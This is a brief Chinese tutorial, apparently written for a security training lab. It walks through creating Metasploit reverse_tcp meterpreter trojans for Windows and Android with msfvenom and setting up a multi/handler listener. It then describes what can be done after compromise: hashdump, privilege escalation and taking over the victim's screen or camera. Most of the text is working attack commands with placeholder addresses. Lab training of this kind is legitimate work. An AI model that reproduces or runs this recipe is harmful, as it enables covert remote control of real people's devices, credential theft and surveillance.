最近涉及到信安实训,所以发挥一下小马达作用
实验的场景设计为,两台PC或1台PC+1台手机
网络为局域网或广域网
目标是实现PC-A或手机-A中木马后,被 PC-B进行反弹链接,然后获得控制,通过命令获得对方的摄像头或其他权限
以下为实验步骤关键代码:
第一步:生成木马
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=xxx.xxx.xxx.xxx LPORT=xyxyxyx -f exe > ./test.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xyxyxyx R > ./lol.apk 生成木马文件,apk安装程序
该语法为windows和Android的木马生成规则,有效载荷不同罢了,其中xxx.xxx.xxx.xxx部分为监听IP xyxyxy为监听端口
第二步:渗透
在Kali中输入msfconsole,并按照下面的参数进行配置:
msfconsole //进入metasploit的终端
msf > use exploit/multi/handler //使用攻击模块,set工具集
set payload windows/meterpreter/reverse_tcp //设置攻击载荷
set lhost xxx.xxx.xxx.xxx //设置攻击机地址
set lport xyxyxy //攻击机的端口
expoit //执行渗透 ,也可以用run
执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈
得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。